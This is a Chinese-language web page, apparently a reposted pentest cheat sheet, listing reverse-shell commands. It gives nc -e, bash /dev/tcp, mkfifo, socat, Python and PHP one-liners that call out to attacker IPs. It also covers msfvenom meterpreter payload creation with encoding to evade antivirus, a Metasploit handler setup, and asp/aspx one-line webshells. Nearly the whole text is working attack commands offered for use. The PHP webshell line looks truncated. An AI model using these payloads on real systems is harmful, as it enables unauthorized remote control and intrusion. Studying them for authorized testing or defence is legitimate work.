栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

转发shell语句

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

转发shell语句

使用nc

方法一

反弹shell

nc -e cmd.exe 攻击机ip 4444(反弹windows shell)
nc -e /bin/bash 攻击机ip 4444(反弹linux shell)

方法二

将shell映射到自己本地的端口上,然后等待他人连接

nc -lvp 4444 -e cmd.exe      (反弹windows shell)
nc -lvp 4444 -e /bin/bash     (反弹linux shell)

连接端口

nc -vv 获取shell的ip 4444

使用msf

msfvenom制作反弹木马,自行选择合适的payload和文件类型,以及修改自己的host'

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.7 lport=4444 -f exe -o 123.exe

msfencode来进行编码免杀,

然后msfconsole来进行监听反弹的窗口

msfdb run
use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.7
run

使用bash
bash -i >& /dev/tcp/10.10.14.2/8081 0>&1
bash -c 'bash -i >& /dev/tcp/10.10.16.7/4444 0>&1'

0<&31-;exec 31<>/dev/tcp/10.10.16.7/4444;sh <&31 >&31 2>&31

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 1234 >/tmp/f

使用socat

这个是从一个老哥那里看来的没有自己使用过,暂作记录内网渗透之——内网转发

socat反弹tcp
接收端(攻击机):
./socat TCP-LISTEN:4444

发送端(靶机):
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.16.7:4444

socat反弹(udp)

接收端:

nc -lvnp 4444

发送端:

socat udp-connect:10.10.16.7:4444 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &

使用python

同样需要nc监听本地端口

nc -lvnp 4444

然后想办法在靶机中执行语句

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket. SOCK_STREAM);s.settimeout(10);s.connect(("10.10.14.8",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

用来转发linux的shell

用python发出一个完整的shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

使用php

需要nc监听本地端口

nc -lvnp 4444

然后再php中文件中注入

php -r '$sock=fsockopen("10.10.16.7",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

或者在文件中直接注入系统语句,并留下变量

再或者利用文件上传,用一句话木马,然后用冰蝎剑蚁菜刀一类的东西来连接

php一句话木马:  

asp一句话木马:  <%eval request ("value")%> 或  <% execute(request("value")) %>  

aspx一句话木马: <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>
 
' ) ; ?>
将当前目录下创建xie.php文件,并且将一句话木马写入xd.php中

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/710112.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号